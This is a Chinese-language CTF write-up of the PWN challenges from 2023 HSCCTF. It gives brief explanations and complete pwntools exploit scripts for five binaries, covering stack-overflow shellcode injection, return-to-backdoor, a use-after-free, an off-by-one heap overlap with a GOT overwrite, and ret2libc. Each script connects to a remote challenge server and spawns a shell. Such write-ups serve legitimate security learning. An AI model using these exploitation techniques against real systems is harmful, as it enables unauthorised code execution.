2023 HSCCTF Write Up

PWN By Comentropy

EZPWN

往可执行区域写入shellcode，栈溢出到shellcode地址，执行shellcode，（该地址在程序内被赋予了执行权限）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./EZPWN"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10962"
    p = remote(ip, port)
    lib = "./libc.so.6"

libc = ELF(lib)
init(lib, binary, p)

if debug and local:
    ggdb()

name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
lg     = lambda buf        : lg_update(name(buf), buf)


shellcode_addr = 0x404080

pad = b''
pad += asm(shellcraft.sh())

# print(hex(len(pad)))

pad = pad.ljust(0x118, b'\x00')
pad += p64(shellcode_addr)

# ru(b'input:\n')

s(pad)

sh()

Morris II

栈溢出到后门即可。只是程序看着较为复杂。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./Morris_II"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10017"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.31.so"

libc = ELF(lib)
init(lib, binary, p)

if debug and local:
    ggdb()

name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
lg     = lambda buf        : lg_update(name(buf), buf)

ru("from below")
sl("0")
ru(b'name!:\n')

padding = 0x10 + 8
ret = 0x40124E
backdoor = 0x0401236

pad = b''
pad += b'a' * padding
pad += p64(ret)
pad += p64(backdoor)

s(pad)

sh()

EasyHeap

uaf修改函数地址为后门地址即可。

（设想，如果这个题没有后门呢，如果改函数地址为system地址，是无法调用到shell的，因为传的参数是其本身，所以如果一定要用这个方法的话，因为题目是32位，地址为4个字节占满的。所以可以修改system地址后面部分为字符串;sh\x00，这样前面不被system识别，后门是可执行的，无聊的猜想，未尝试，对错概不负责。）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./easyHeap"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10945"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.34.so"

libc = ELF(lib)
init(lib, binary, p)

if debug and local:
    ggdb()

name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
lg     = lambda buf        : lg_update(name(buf), buf)

def cmd(c):
    ru(b'Input Option: ')
    sl(str(c))

def add(size, content):
    cmd(1)
    ru(b'Size: ')
    sl(str(size))
    ru(b'Content: ')
    s(content)

def free(idx):
    cmd(2)
    ru(b'Note id: ')
    sl(str(idx))

def show(idx):
    cmd(3)
    ru(b'Note id: ')
    sl(str(idx))

backdoor = 0x080495BD

add(0x20, b'aaaa')
add(0x20, b'aaaa')

free(0)
free(1)
# 1 -> 0

add(8, p32(backdoor))
show(0)

sh()

Dead Star Weapon Management System

该题是一血，off by one构造chunk extend and overlapping即可。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./deathstar_admin"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10638"
    p = remote(ip, port)
    lib = "./libc.so.6"

libc = ELF(lib)
init(lib, binary, p)

if debug and local:
    ggdb()

name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
lg     = lambda buf        : lg_update(name(buf), buf)

def cmd(c):
    ru(b'[?]choose an action:\n')
    sl(str(c))

def add(size, content):
    cmd(1)
    ru(b'weapon length:\n')
    sl(str(size))
    ru(b'weapon detail:\n')
    s(content)

def show(idx):
    cmd(2)
    sl(str(idx))

def edit(idx, content):
    cmd(3)
    ru(b'weapon index:\n')
    sl(str(idx))
    ru(b'your additional info:\n')
    s(content)

def free(idx):
    cmd(4)
    ru(b'weapon index:\n')
    sl(str(idx))

add(0x18, b'aaaa') # 0
add(0x10, b'bbbb') # 1

pad1 = b''
pad1 += p64(0) * 2
pad1 += p64(0) + p8(0x41)
edit(0, pad1)

free(1)

pad2 = b''
pad2 += p64(0) * 2
pad2 += p64(0) + p64(0x21)
pad2 += p64(0x30) + p64(elf.got['free'])
add(0x30, pad2) # 1

show(1)

free_addr = r7f()
lg(free_addr)
libc_base = free_addr - libc.sym['free']
libc = lg(libc_base)

pad3 = b''
pad3 += p64(libc.sym['system'])

edit(1, pad3)

add(0x10, b'/bin/sh\x00') # 2

free(2)

sh()

Safe Program

栈溢出拿shell即可。exp如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

local = 0
debug = 1

binary = "./Safe_Program"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10868"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.31.so"

libc = ELF(lib)
init(lib, binary, p)

if debug and local:
    ggdb()

name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
lg     = lambda buf        : lg_update(name(buf), buf)

padding = 0x80 + 8
pop_rdi_ret = 0x401393
ret = 0x40101a
main = 0x401247

pad1 = b''
pad1 += b'a' * padding
pad1 += p64(pop_rdi_ret)
pad1 += p64(elf.got['puts'])
pad1 += p64(elf.plt['puts'])
pad1 += p64(main)

ru(b'to me now:\n\n')
sleep(3)
s(pad1)

puts_addr = r7f()
lg(puts_addr)

libc_base = puts_addr - libc.sym['puts']
libc = lg(libc_base)

pad2 = b''
pad2 += b'a' * padding
pad2 += p64(ret)
pad2 += p64(pop_rdi_ret)
pad2 += p64(next(libc.search(b"/bin/sh\x00")))
pad2 += p64(libc.sym['system'])
pad2 += p64(main)

ru(b'to me now:\n\n')
sleep(3)
s(pad2)

sh()